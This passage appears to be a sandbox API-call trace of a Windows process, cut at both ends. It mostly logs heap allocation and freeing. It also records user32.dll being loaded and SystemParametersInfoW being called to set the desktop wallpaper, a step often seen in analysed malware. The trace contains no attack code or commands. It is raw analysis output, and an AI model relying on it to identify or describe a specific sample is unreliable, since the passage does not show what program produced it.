0x34aa610 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0301.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0301.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0301.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0301.423] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0301.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0301.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0301.424] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.424] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0301.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.425] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0301.426] LoadLibraryW (lpLibFileName="user32.dll") returned 0x74f40000 [0301.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0301.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0301.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x16) returned 0x2466e10 [0301.426] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemParametersInfoW", cchWideChar=22, lpMultiByteStr=0x2466e10, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemParametersInfoW", lpUsedDefaultChar=0x0) returned 22 [0301.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0301.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0301.426] GetProcAddress (hModule=0x74f40000, lpProcName="SystemParametersInfoW") returned 0x74f590d3 [0301.426] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0301.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0301.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0301.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0301.427] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.427] SystemParametersInfoW (in: uiAction=0x14, uiParam=0x0, pvParam=0x0, fWinIni=0x0 | out: pvParam=0x0) returned 1 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0301.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0301.527] FreeLibrary (hLibModule=0x74f40000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0301.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0301.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0301.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0301.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0301.529] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0301.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0301.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0301.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0301.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0301.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0301.532] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0301.532] RtlAllocateHeap (HeapHandle=0x25c0000, 